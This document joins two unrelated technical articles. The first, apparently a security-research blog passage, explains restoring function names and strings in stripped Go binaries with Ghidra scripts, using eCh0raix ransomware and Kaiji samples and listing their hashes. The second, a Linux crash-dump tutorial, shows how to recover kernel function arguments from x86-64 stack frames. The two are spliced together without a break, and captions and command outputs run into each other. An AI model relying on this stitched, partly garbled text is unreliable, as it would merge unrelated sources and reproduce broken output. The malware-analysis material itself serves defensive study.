These examples neatly show that even a simple “hello world” Go binary is huge, having more than a thousand functions. And in the stripped version reverse engineers cannot rely on the function names to aid their analysis.

Note: Due to stripping, not only did the function names disappear, but Ghidra also recognized only 1,139 functions of the 1,790 defined functions.

We were interested in whether there was a way to recover the function names within stripped binaries. First, we ran a simple string search to check if the function names were still available within the binaries. In the C example we looked for the function “main”, while in the Go example it was “main.main”.searching for main function

Figure 5 – hello_c[3] strings – “main” was found

Figure 6 – hello_c_strip[4] strings – “main” was not foundsearching for main.main function in go binary

Figure 7 – hello_go[5] strings – “main.main” was found

Figure 8 – hello_go_strip[6] strings – “main.main” was found

The strings utility could not find the function name in the stripped C binary[4], but “main.main” was still available in the Go version[6]. This discovery gave us some hope that function name recovery could be possible in stripped Go binaries.

Loading the binary[6] to Ghidra and searching for the “main.main” string will show its exact location. As you can be seen in the image below, the function name string is located within the .gopclntab section.ghidra main.main string go binary

Figure 9 – hello_go_strip[6] main.main string in Ghidra

The pclntab structure is available since Go 1.2 and nicely documented. The structure starts with a magic value followed by information about the architecture. Then the function symbol table holds information about the functions within the binary. The address of the entry point of each function is followed by a function metadata table.

pclntab structure go string

The function metadata table, among other important information, stores an offset to the function name.

It is possible to recover the function names by using this information. Our team created a script (go_func.py) for Ghidra to recover function names in stripped Go ELF files by executing the following steps:

  • Locates the pclntab structure
  • Extracts the function addresses
  • Finds function name offsets

Executing our script not only restores the function names, but it also defines previously unrecognized functions.defining undefined strings in go binary with ghidra

Figure 10 – hello_go_strip[6] function list after executing go_func.py

To see a real-world example let’s look at an eCh0raix ransomware sample[9]:ghidra ech0raix function list

Figure 11 – eCh0raix[9] function list

Figure 12 – eCh0raix[9] function list after executing go_func.py

This example clearly shows how much help the function name recovery script can be during reverse engineering. Analysts can assume that they are dealing with ransomware just by looking at the function names.

Note: There is no specific section for the pclntab structure in Windows Go binaries, and researchers need to explicitly search for the fields of this structure (e.g. magic value, possible field values). For macOS, the _gopclntab section is available, similar to .gopclntab in Linux binaries.

Challenges: Undefined Function Name Strings

If a function name string is not defined by Ghidra, then the function name recovery script will fail to rename that specific function, since it cannot find the function name string at the given location. To overcome this issue our script always checks if a defined data type is located at the function name address and, if not, tries to define a string data type at the given address before renaming a function.

In the example below, the function name string “log.New” is not defined in an eCh0raix ransomware sample[9], so the corresponding function cannot be renamed without creating a string first.

Figure 13 – eCh0raix[9] log.New function name undefined

Figure 14 – eCh0raix[9] log.New function couldn’t be renamed

The following lines in our script solve this issue:

Figure 15 – go_func.py

Unrecognized Strings in Go Binaries

The second issue that our scripts are solving is related to strings within Go binaries. Let’s turn back to the “Hello Hacktivity” examples and take a look at the defined strings within Ghidra.

70 strings are defined in the C binary[3], with “Hello, Hacktivity!” among them. Meanwhile, the Go binary[5] includes 6,540 strings, but searching for “hacktivity” gives no result. Such a high number of strings already makes it hard for reverse engineers to find the relevant ones, but, in this case, the string that we expected to find was not even recognized by Ghidra.start reverse engineering go binary with ghidra

Figure 16 – hello_c[3] defined strings with “Hello, Hacktivity!”

Figure 17 – hello_go[5] defined strings without “hacktivity”

To understand this problem, you need to know what a string is in Go. Unlike in C-like languages, where strings are sequences of characters terminated with a null character, strings in Go are sequences of bytes with a fixed length. Strings are Go-specific structures, built up by a pointer to the location of the string and an integer, which is the length of the string.

These strings are stored within Go binaries as a large string blob, which consists of the concatenation of the strings without null characters between them. So, while searching for “Hacktivity” using strings and grep gives the expected result in C, it returns a huge string blob containing “hacktivity” in Go.

Figure 18 – hello_c[3] string search for “Hacktivity”golang string blob

Figure 19 – hello_go[5] string search for “hacktivity”

Since strings are defined differently in Go, and the results referencing them within the assembly code are also different from the usual C-like solutions, Ghidra has a hard time with strings within Go binaries.

The string structure can be allocated in many different ways, it can be created statically or dynamically during runtime, it varies within different architectures and might even have multiple solutions within the same architecture. To solve this issue, our team created two scripts to help with identifying strings.

Dynamically Allocating String Structures

In the first case, string structures are created during runtime. A sequence of assembly instructions is responsible for setting up the structure before a string operation. Due to the different instruction sets, structure varies between architectures. Let’s go through a couple of use cases and show the instruction sequences that our script (find_dynamic_strings.py) looks for.

Dynamically Allocating String Structures for x86

First, let’s start with the “Hello Hacktivity” example[5].dynamically allocating string structures in x86

Figure 20 – hello_go[5] dynamic allocation of string structure

Figure 21 – hello_go[5] undefined “hello, hacktivity” string

After running the script, the code looks like this:

Figure 22 – hello_go[5] dynamic allocation of string structure after executing find_dynamic_strings.py

The string is defined:

Figure 23 – hello_go[5] defined “hello hacktivity” string

And “hacktivity” can be found in the Defined Strings view in Ghidra:defined strings golang binary ghidra

Figure 24 – hello_go[5] defined strings with “hacktivity”

The script looks for the following instruction sequences in 32-bit and 64-bit x86 binaries:

Figure 25 – eCh0raix[9] dynamic allocation of string structure

Figure 26 – hello_go[5] dynamic allocation of string structure

ARM Architecture and Dynamic String Allocation

For the 32-bit ARM architecture, I use the eCh0raix ransomware sample[10] to illustrate string recovery.ARM architecture and dynamic string allocation ech0raix

Figure 27 – eCh0raix[10] dynamic allocation of string structure

Figure 28 – eCh0raix[10] pointer to string address

Figure 29 – eCh0raix[10] undefined string

After executing the script, the code looks like this:

Figure 30 – eCh0raix[10] dynamic allocation of string structure after executing find_dynamic_strings.py

The pointer is renamed, and the string is defined:

Figure 31 – eCh0raix[10] pointer to string address after executing find_dynamic_strings.py

Figure 32 – eCh0raix[10] defined string after executing find_dynamic_strings.py

The script looks for the following instruction sequence in 32-bit ARM binaries:

For the 64-bit ARM architecture, let’s use a Kaiji sample[12] to illustrate string recovery. Here, the code uses two instruction sequences that only vary in one sequence.ARM dynamic string allocation Kaiji

Figure 33 – Kaiji[12] dynamic allocation of string structure

After executing the script, the code looks like this:

Figure 34 – Kaiji[12] dynamic allocation of string structure after executing find_dynamic_strings.py

The strings are defined:

Figure 35 – Kaiji[12] defined strings after executing find_dynamic_strings.py

The script looks for the following instruction sequences in 64-bit ARM binaries:

As you can see, a script can recover dynamically allocated string structures. This helps reverse engineers read the assembly code or look for interesting strings within the Defined String view in Ghidra.

Challenges for This Approach

The biggest drawback of this approach is that each architecture (and even different solutions within the same architecture) requires a new branch to be added to the script. Also, it is very easy to evade these predefined instruction sets. In the example below, where the length of the string is moved to an earlier register in a Kaiji 64-bit ARM malware sample[12], the script does not expect this and will therefore miss this string.

Figure 36 – Kaiji[12] dynamic allocation of string structure in an unusual way

Figure 37 – Kaiji[12] an undefined string

Statically Allocated String Structures

In this next case, our script (find_static_strings.py) looks for string structures that are statically allocated. This means that the string pointer is followed by the string length within the data section of the code.

This is how it looks in the x86 eCh0raix ransomware sample[9].statistically allocating string structures

Figure 38 – eCh0raix[9] static allocation of string structures

In the image above, string pointers are followed by string length values, however, Ghidra couldn’t recognize the addresses or the integer data types, except for the first pointer, which is directly referenced in the code.

Figure 39 – eCh0raix[9] string pointer

Undefined strings can be found by following the string addresses.

Figure 40 – eCh0raix[9] undefined strings

After executing the script, string addresses will be defined, along with the string length values and the strings themselves.

Figure 41 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Figure 42 – eCh0raix[9] defined strings after executing find_static_strings.py

Challenges: Eliminating False Positives and Missing Strings

We want to eliminate false positives, which is why we:

  • Limit the string length
  • Search for printable characters
  • Search in data sections of the binaries

Obviously, strings can easily slip through as a result of these limitations. If you use the script, feel free to experiment, change the values, and find the best settings for your analysis. The following lines in the code are responsible for the length and character set limitations:

Figure 43 – find_static_strings.py

Figure 44 – find_static_strings.py

Further Challenges in String Recovery

Ghidra’s auto analysis might falsely identify certain data types. If this happens, our script will fail to create the correct data at that specific location. To overcome this issue the incorrect data type has to be removed first, and then the new one can be created.

For example, let’s take a look at the eCh0riax ransomware[9] with statically allocated string structures.string structure recovery statistic allocation

Figure 45 – eCh0raix[9] static allocation of string structures

Here the addresses are correctly identified, however, the string length values (supposed to be integer data types) are falsely defined as undefined4 values.

The following lines in our script are responsible for removing the incorrect data types:

Figure 46 – find_static_strings.py

After executing the script, all data types are correctly identified and the strings are defined.

Figure 47 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Another issue comes from the fact that strings are concatenated and stored as a large string blob in Go binaries. In some cases, Ghidra defines a whole blob as a single string. These can be identified by the high number of offcut references. Offcut references are references to certain parts of the defined string, not the address where the string starts, but rather a place inside the string.

The example below is from an ARM Kaiji sample[12].

Figure 48 – Kaiji[12] falsely defined string in Ghidrafalsely defined string Kaiji reverse engineering go binary with ghidra

Figure 49 – Kaiji[12] offcut references of a falsely defined string

To find falsely defined strings, one can use the Defined Strings window in Ghidra and sort the strings by offcut reference count. Large strings with numerous offcut references can be undefined manually before executing the string recovery scripts. This way the scripts can successfully create the correct string data types.offcut reference ghidra

Figure 50 – Kaiji[12] defined strings

Lastly, we will show an issue in the Ghidra Decompile view. Once a string is successfully defined either manually or by one of our scripts, it will be nicely visible in the listing view of Ghidra, helping reverse engineers read the assembly code. However, the Decompiler view in Ghidra cannot handle fixed-length strings correctly and, regardless of the length of the string, it will display everything until it finds a null character. Luckily, this issue will be solved in the next release of Ghidra (9.2).

This is how the issue looks with the eCh0raix sample[9].

Figure 51 – eCh0raix[9] defined string in listing viewghidra decompile view ech0raix defined string

Figure 52 – eCh0raix[9] defined string in Decompile view

Future Work with Reverse Engineering Go

This article focused on the solutions for two issues within Go binaries to help reverse engineers use Ghidra and statically analyze malware written in Go. We discussed how to recover function names in stripped Go binaries and proposed several solutions for defining strings within Ghidra. The scripts that we created and the files we used for the examples in this article are publicly available, and the links can be found below.

This is just the tip of the iceberg when it comes to the possibilities for Go reverse engineering. As a next step, we are planning to dive deeper into Go function call conventions and the type system.

In Go binaries arguments and return values are passed to functions by using the stack, not the registers. Ghidra currently has a hard time correctly detecting these. Helping Ghidra to support Go’s calling convention will help reverse engineers understand the purpose of the analyzed functions.

Another interesting topic is the types within Go binaries. Just as we’ve shown by extracting function names from the investigated files, Go binaries also store information about the types used. Recovering these types can be a great help for reverse engineering. In the example below, we recovered the main.Info structure in an eCh0raix ransomware sample[9]. This structure tells us what information the malware is expecting from the C2 server.reverse engineering go binary with ghidra

Figure 53 – eCh0raix[9] main.info structure

Figure 54 – eCh0raix[9] main.info fields

Figure 55 – eCh0raix[9] main.info structure

As you can see, there are still many interesting areas to discover within Go binaries from a reverse engineering point of view. Stay tuned for our next write-up.

Github repository with scripts and additional materials

Files used for the research

File nameSHA-256
[1]hello.cab84ee5bcc6507d870fdbb6597bed13f858bbe322dc566522723fd8669a6d073
[2]hello.go2f6f6b83179a239c5ed63cccf5082d0336b9a86ed93dcf0e03634c8e1ba8389b
[3]hello_cefe3a095cea591fe9f36b6dd8f67bd8e043c92678f479582f61aabf5428e4fc4
[4]hello_c_strip95bca2d8795243af30c3c00922240d85385ee2c6e161d242ec37fa986b423726
[5]hello_go4d18f9824fe6c1ce28f93af6d12bdb290633905a34678009505d216bf744ecb3
[6]hello_go_strip45a338dfddf59b3fd229ddd5822bc44e0d4a036f570b7eaa8a32958222af2be2
[7]hello_go.exe5ab9ab9ca2abf03199516285b4fc81e2884342211bf0b88b7684f87e61538c4d
[8]hello_go_strip.execa487812de31a5b74b3e43f399cb58d6bd6d8c422a4009788f22ed4bd4fd936c
[9]eCh0raix – x86154dea7cace3d58c0ceccb5a3b8d7e0347674a0e76daffa9fa53578c036d9357
[10]eCh0raix – ARM3d7ebe73319a3435293838296fbb86c2e920fd0ccc9169285cc2c4d7fa3f120d
[11]Kaiji – x86_64f4a64ab3ffc0b4a94fd07a55565f24915b7a1aaec58454df5e47d8f8a2eec22a
[12]Kaiji – ARM3e68118ad46b9eb64063b259fca5f6682c5c2cb18fd9a4e7d97969226b2e6fb4

References and further reading

Solutions by other researchers for various tools

IDA Pro

radare2 / Cutter

Binary Ninja

Ghidra

Extracting kernel stack function arguments from Linux x86-64 kernel crash dumps

Original text

Introduction

It’s common, when analysing a kernel crash dump, to look at kernel tasks’ stack backtraces in order to see what the tasks are doing, e.g. what nested function calls led to the current position; this is easily displayed by the crash utility. We often want also to know the arguments to those function calls; unfortunately these are not so easily displayed.

This blog will illustrate some techniques for extracting kernel function call arguments, where possible, from the crash dump. Several worked examples are given. The examples are from the Oracle UEK kernel, but the techniques are applicable to any Linux kernel.

Note: The Python-Crash API toolkit pykdump includes the command fregs, which automates some of this process. However, it is useful to study how to do it manually, in order to understand what’s going on, and to be able to do it when pykdump may not be available, or if fregs fails to produce the desired result.

Basics

This section gives the minimum detail needed to use the techniques. Background explanatory detail will be given in a subsequent section.

You need to know a little bit of the x86 instruction set, but not much. You can get started knowing just that mov %r12,%rdi places the contents of cpu register %r12 into register %rdi, and that mov 0x8(%r14),%rcx takes the contents of register %r14, adds 8 to it, takes the result as the address of a memory location, reads the value at that memory location and puts it into register %rcx.

For the Linux kernel running on the x86-64 architecture, kernel function arguments are normally passed using 64-bit cpu registers. The first six arguments to a function are passed in the following cpu registers, respectively: %rdi%rsi%rdx%rcx%r8%r9.

To slightly complicate matters, these 64-bit register contents may be accessed via shorter subsets under different names (for compatibility with previous 32/16/8-bit instruction sets), as shown in the following table:

The contents of these registers are not preserved (for every kernel function call) in the crash dump. However, it is often possible to extract the values that were placed into these registers, from the kernel stack, or from memory.

In order to find out the arguments supplied to a given function, we need to look at the disassembled code for either the calling function, the called function, or both.

If we disassemble the caller’s code, we can see where it obtained the values to place into the registers used to pass the arguments to the called function. We can also disassemble the called function, to see if it stored the values it was passed in those registers, to its stack or to memory.

We may then be able to extract those values from the same place, if that is either on the kernel stack, or in kernel memory (if it has not been subsequently changed), both of which are normally included in the crash dump.

The techniques shown cover different ways that the compiler might have chosen to store the values that are passed in the registers:

  • The calling function might retrieve the values from:
    • Memory
    • The calling function’s stack, via an offset from the (fixed) base of the stack
    • Another register, which got its value from one of these above in turn
  • The called function might save the values it received in the registers, to:
    • Memory
    • The called function’s stack, via push
    • Another register, which might itself then be saved in turn

Therefore the technique we use is to:

  • Disassemble either or both of:
    • The calling function, leading up to the callq instruction, to see from where it obtains the values it passes to the called function in the registers
    • The called function, to see whether it puts the values from the registers onto its stack, or into memory
  • Inspect those areas (caller/callee stack and/or memory) to see if the values may be extracted

In some cases, it might not be possible to use any of the above methods to find the arguments passed. If this is the case, consider looking at another level of the stack: it’s quite common for the same value to be passed down from one function to the next. Thus although you might be unsuccessful trying to recover that argument’s value using the above methods for your function of interest, that same value might be passed down to further functions (or itself been passed down from earlier functions), and you might have more luck finding it looking at one of those other functions, using the methods above. The value might also be itself contained in another structure, which may be passed in a function argument. A knowledge of the code in question obviously helps in this case.

Finding a function’s stack frame base pointer

For some of the methods noted above, we will need to know how to find the (fixed) base of a kernel function’s stack. Whilst the function is executing, this is stored in the %rbp register, the function’s stack frame base pointer. We may find it in two places in the kernel task’s stack backtrace.

To show a kernel task’s stack backtrace, use bt:

Note: -sx tells bt to try to show addresses as as symbol name plus a hex offset.

The above lists the functions calls found in the stack; we also want to see the actual stack content, i.e. the content of the stack frames, for each function call. Let’s say we are interested in the arguments passed to the mutex_lock call; we may therefore need to look at its caller, which is do_last, so let’s concentrate on its stack frame:

Note: -FF tells bt to show all the data for a stack frame, symbolically, with its slab cache name, if appropriate.

The stack frame of the calling function do_last is shown above. Its stack frame base pointer 0xffff88180dc37d58 appears in two locations, shown highlighted with ***.

The stack frame base pointer, for a function, may be found:

  • As the second-last value in the stack frame above the function (i.e. above in the bt output)
  • As the location of the second-last value in the stack frame for the function

For now, just use the above to find the value of the stack frame base pointer, for a function, if you need it. The structure of the stack frame will be explained in the following section.

Summary of steps

  1. Note which registers you need, corresponding to the position of the called function’s arguments you need
    1. Refer to the register-naming table above, in case the quantities passed are smaller than 64-bit, e.g. integers, other non-pointer types. The 1st argument will be passed in %rdi%edi%di or %dil. Note that all the names contain «di«.
  2. Disassemble the calling function, and inspect the instructions leading up to where it calls the function you’re interested in. Note from where the compiler gets the values it places in those registers
    1. If from the stack, find the caller’s stack frame base pointer, and from there find the value in the stack frame
    2. If from memory, can you calculate the memory address used? If so, read the value from memory
    3. If from another register, from where was that register’s contents obtained? And see case 3.3 below.
  3. Disassemble the first part of the called function. Note where it stores the values passed in the registers you need
    1. If onto the stack, find the called function’s stack frame base pointer, and find the value in the stack frame
    2. If from memory, can you calculate the memory address used? If so, read the value from memory
    3. If the calling function obtained the value from another register (case 2.3 above) does the called function save that register to stack/memory?
  4. If none of the above gave a usable result, see if the values you need are passed to another function call further up or down the stack, or may be derived from a different value.
    1. For example the structure you want is referenced from another structure that is passed to a function elsewhere in the stack trace
  5. Once you’ve obtained answers, perform a sanity check
    1. Is the value obtained on a slab cache? If so, is the cache of the expected type?
    2. Is the value, or what it points to, of the expected type?
    3. If the value is a pointer to a structure, does the structure content look correct? e.g. pointers where pointers are expected, function op pointers pointing to real functions, etc
  6. Read the Caveats section, to understand whether you can rely on the answer you’ve found

At this point, you may either skip directly to the Worked Examples , or read on for more detail.

In more depth

This section gives more background. If you’re in a hurry, skip directly to the Worked Examples, and come back and read this later; it may help in understanding what’s going on, and in identifying edge cases and other apparently odd behaviour.

In Linux on x86-64, the kernel stack grows down, from larger towards smaller memory addresses. i.e. a particular function’s stack frame grows downwards from its fixed stack frame base pointer %rbp, with new elements being added via the push instruction, which first decrements the current stack pointer %rsp (which points to the item on the «top» (lowest memory address) of the stack) by the size of the element pushed onto the stack, then copies its argument to the stack location now pointed at by %rsp, which is left pointing at the new item on top of the stack.

However, the bt command shows the stack in ascending memory order, as you read down the page. Therefore we may imagine the bt display of a stack frame as like a pile of magazines stacked up on the table. The top line shown is the top of the stack, which is stored in the stack pointer register %rsp, and is where new items are pushed onto the stack (magazines added to the pile). The bottom line is the stack frame base (the table), which is fixed, stored in the stack frame base pointer %rbp (yes, I’m neglecting the function’s return address here).

Kernel function stack frame layout

The stack consists of multiple frames, one per function. The layout of a kernel function’s stack frame is as follows (in the ascending memory location order as shown by bt):

This is built-up in stages, as follows. When a function is called the callq instruction does two things:

  • Pushes the address of the instruction following the callq instruction onto the stack (still the caller’s stack frame, at this point). This will be the return address for the called function.
  • Jumps to the first instruction in the called function.

At this point, what will become the stack frame for the called function now looks like this:

The compiler has inserted the following preamble instructions before the start of the code for most called functions:

The push puts the caller’s stack frame base pointer on top of the stack frame, which now looks like this:

The mov changes the stack frame base pointer register %rbp to also point to the top of the stack, which now looks like this:

From now on, %rsp gets decremented as we add things to the top of the stack, but %rbp remains fixed, denoting the base of the stack. Below that, at the very bottom, is the return address, which records the location of the instruction after the callq instruction, in the calling function (this is the instruction to which this called function will return, via the retq instruction). From now on, the called function’s stack frame looks like this:

Caveats

  • The description here applies to arguments of simple type, e.g. integer, long, pointer, etc. Things are not quite the same for more complex types, e.g. struct (as a struct, not a pointer to a struct), float, etc. For more detail, refer to the References.
  • Remember that the crash dump contains data from when the system crashed, not from the point of execution of the instruction you may be looking at. For example:
    • Memory content will be that of when the system crashed, which may be many function calls deeper in the stack below where you are looking, some of which may have overwritten that area of memory
    • Stack frame content will be that of when the function (whose stack frame you’re looking at) called the next-deeper function. If the function you’re looking at went on to modify that stack location, before calling the next-deeper function, that is what you will see when you look at the stack frame
  • Remember that there may be more than one code path branch within a function, leading to a callq instruction. The different paths may populate the function-call registers from different sources, and/or with different values. Your linear reading of the instructions leading up to the callq may not be the path that the code took in every instance.

FAQ

References

  1. https://cs61.seas.harvard.edu/site/2018/Asm2/
  2. https://www.wikiwand.com/en/X86_calling_conventions#/x86-64_calling_conventions

Worked examples

Example 1

In this example, we have a hanging task, stuck trying to fsync a file. We want to obtain the struct file pointer, and fl_owner for the file in question.

Let’s start by trying to find it via the arguments to filp_close.

Note: bt -l shows file and line number of each stack trace function call.

int filp_close(struct file *filp, fl_owner_t id)typedef void *fl_owner_t;

The compiler will use registers %rdi & %rsi, respectively, to pass the two arguments to filp_close.

Let’s look at the full stack frame for filp_close:

Let’s disassemble the calling function put_files_struct, to see where the compiler obtains the values it will pass in registers to filp_close:

The first argument, the struct file pointer will be passed in register %rdi. The compiler fills that register in this way:

We can’t easily retrieve the first argument using this method, since we don’t know the values of %rcx or %rax.

So how about the second argument? That is passed in register %rsi, which is populated from another register %r13:

0xffffffff8122d5e9 <put_files_struct+0x89>: mov %r13,%rsi

That’s not immediately helpful, until we notice what the called function filp_close does, immediately after being called:

crash7latest> dis -x filp_close | head0xffffffff8120b1b0 <filp_close>: push %rbp0xffffffff8120b1b1 <filp_close+0x1>: mov %rsp,%rbp0xffffffff8120b1b4 <filp_close+0x4>: push %r13

Notice that filp_close pushes %r13 onto its stack. This is the first push instruction that is done by filp_close after its initial push of %rbp. Let’s look again at the stack frame for filp_close:

#13 [ffff8807b1f1fc20] filp_close+0x36 at ffffffff8120b1e6ffff8807b1f1fc28: ffffffffffffffff 000000000000ffffffff8807b1f1fc38: 0000000000000000 [ffff8800c0b21b80:files_cache]ffff8807b1f1fc48: ffff8807b1f1fc98 put_files_struct+145

Referring back to the Basics section, we can identify the stack frame base pointer %rbp for filp_close as 0xffff8807b1f1fc48.

Referring back to the stack frame layout section, we can see that the stack for filp_close starts at the very bottom with its return address put_files_struct+145. The next address «up» (in the bt display) is location 0xffff8807b1f1fc48, which is filp_close‘s stack frame base pointer %rbp. It contains a pointer to the parent (put_files_struct) stack frame base pointer 0xffff8807b1f1fc98. From then on «up» are the normal stack pushes done by filp_close. Since the push of %r13 is the first push (following the preamble push of %rbp), we find it next: 0xffff8800c0b21b80, which is the value of fl_owner_t id.

To find on the stack the content of push number n (following the preamble push of %rbp) we calculate the address: %rbp — (n * 8) In this case, n == 1, the first push, so:

crash7latest> px (0xffff8807b1f1fc48 - 1*8)$1 = 0xffff8807b1f1fc40

Note: px print expression in hex and read its contents:

crash7latest> rd 0xffff8807b1f1fc40ffff8807b1f1fc40: ffff8800c0b21b80

Thus we find the value of fl_owner_t id == 0xffff8800c0b21b80.

We could, of course, simply have walked «up» the stack frame visually, counting pushes, rather than manually calculating the address.

We still need to find the first argument, the struct file, but we may find that elsewhere, in another function on the stack… it is also the first argument of:

int vfs_fsync(struct file *file, int datasync)

and so will be passed in register %rdi.

Here’s the relevant extract from the stack backtrace:

#11 [ffff8807b1f1fbf0] vfs_fsync+0x1c at ffffffff8124123c#12 [ffff8807b1f1fc00] nfs_file_flush+0x80 at ffffffffc02d2630 [nfs]

Let’s disassemble the caller, leading up to the call:

On line 8 we see that register %rdi — the first argument to vfs_fsync — is populated from register %rbx. (Whilst we’re here, note that the second argument is passed in register %esi, which is the 32-bit subset of the 64-bit register %rsi, since the second argument is an integer: int datasync)

Now disassemble the called function:

We see that vfs_fsync does not save %rbx on its stack, but nor does it alter it before calling vfs_fsync_range. Now disassemble the latter:

crash7latest> dis -x vfs_fsync_range | head
0xffffffff81241170 <vfs_fsync_range>: push %rbp
0xffffffff81241171 <vfs_fsync_range+0x1>: mov %rsp,%rbp
0xffffffff81241174 <vfs_fsync_range+0x4>: push %r14
0xffffffff81241176 <vfs_fsync_range+0x6>: push %r13
0xffffffff81241178 <vfs_fsync_range+0x8>: push %r12
0xffffffff8124117a <vfs_fsync_range+0xa>: push %rbx

We see that vfs_fsync_range saves %rbx to its stack. It’s the fourth push (after the preamble).

Find vfs_fsync_range’s stack frame base pointer: 0xffff8807b1f1fbe8. Use the method shown in the Basics section.

Find the value four 8-byte values (four pushes) up from the stack frame base:

crash7latest> px (0xffff8807b1f1fbe8 - 4*8)$4 = 0xffff8807b1f1fbc8crash7latest> rd 0xffff8807b1f1fbc8ffff8807b1f1fbc8: ffff8807eb507b00

We have found our value:

struct file *file = 0xffff8807eb507b00

Perform a sanity check; let’s check that the file structure’s ops pointers point to an NFS function:

crash7latest> struct -p file.f_op ffff8807eb507b00 | grep llseekllseek = 0xffffffffc034d2c0,
crash7latest> dis 0xffffffffc034d2c0 1
0xffffffffc034d2c0 nfs4_file_llseek: push %rbp

Example 2

Here’s a UEK4 dump, where a process is hung, blocked waiting for a mutex.

We want to find the mutex on which it is waiting. Let’s see how do_last calls mutex_lock:

dis -r (reverse) displays all instructions from the start of the routine up to and including the designated address.

dis -x overrides the default output format with hexadecimal format.

The first arg to mutex_lock is passed in %rdi, which is populated like this:

0xffffffff8121409d
<do_last+0x36d>: mov -0x48(%rbp),%rax0xffffffff812140a1
<do_last+0x371>: mov 0x30(%rax),%rax0xffffffff812140a5 <do_last+0x375>: lea 0xa8(%rax),%rdi

We need to start with do_last‘s stack frame (base) pointer %rbp.

That may be found here:

crash7latest> bt -FFsx
...
ffff88180dc37ca8: ***ffff88180dc37d58*** do_last+901
#5 [ffff88180dc37cb0] do_last+0x385 at ffffffff812140b5

%rbp is ffff88180dc37ca8, and the value at that location — denoted by (%rbp) — is ffff88180dc37d58

Then we can emulate the effects of the mov/lea instructions, to arrive at the value that do_last put into %rdi:

We can also note that since we’ve offset from the stack frame pointer %rbp, this value is on the stack, and bt will tell us more about it, specifically whether it’s part of a slab cache and, if so, which one:

Address 0xffff88180dc37d10 contains a pointer to something from the dentry slab cache, i.e. a dentry.

At this point, we have the dentry pointer in %rax. The next instruction offsets 0x30 from the dentry:

struct -o shows member offsets when displaying structure definitions; if used with an address or symbol argument, each member will be preceded by its virtual address.

struct -x overrides default output format with hexadecimal format.

So the above is the inode.

The next instruction offsets 0xa8 from the inode:

So the above is the mutex, and this (0xffff881d4603e6a8) is what ends up in %rdi, which becomes the first arg to mutex_lock, as expected:

*void __sched mutex_lock(struct mutex *lock)*

Having found the mutex, we would likely want to find its owner:

Example 3

In this example, we look at a UEK3 crash dump, from a system where processes were spending a lot of time in ‘D’ state waiting for an NFS server to respond. The system crashed since hung_task_panic was set (which is not a good idea on a production system, and should never be set on an NFS client or server).

Looking at the hung task:

From the hung task traceback, we can see that nfs_getattr is stuck waiting on a mutex. It wants to write-back dirty pages, before performing the getattr call, and it grabs the inode mutex to keep other apps out from writing whilst we’re trying to write-back. So, we need to find out who’s got that inode mutex.

Let’s see how nfs_getattr calls mutex_lock:

The first arg to mutex_lock is the mutex, which is passed in %rdi.

We can see that nfs_getattr fills %rdi from %rdx, before calling mutex_lock, but it also stores %rdx at an offset from its stack frame base pointer %rbp:

*0xffffffffc09e5dc5 <nfs_getattr+0x1a5>: mov %rdx,-0x38(%rbp)*

We can get nfs_getattr’s %rbp here:

So let’s calculate that offset:

12crash7latest> px (0xffff9c88b79bfe30-0x38)$1 = 0xffff9c88b79bfdf8

and read the value there, which will be the value of %rdx, i.e. the address of the mutex:

12crash7latest> rd -x 0xffff9c88b79bfdf8ffff9c88b79bfdf8: ffff9c8ed6bb4808

Note: rd reads memory

Let’s see who owns it:

crash7latest> mutex.owner 0xffff9c8ed6bb4808
owner = 0xffff9c5f0ab25140
crash7latest> task 0xffff9c5f0ab25140 | head
PID: 30365 TASK: ffff9c5f0ab25140 CPU: 5 COMMAND: "ls"

and what is that ls task doing?

So, the mutex is held by another NFS getattr task, that is in the process of performing the write-back. This is likely just part of the normal NFS writeback, blocked by congestion, a slow server, or some other interruption.

As mentioned already in general it is advised never to set hung_task_panic on a production NFS system (client or server).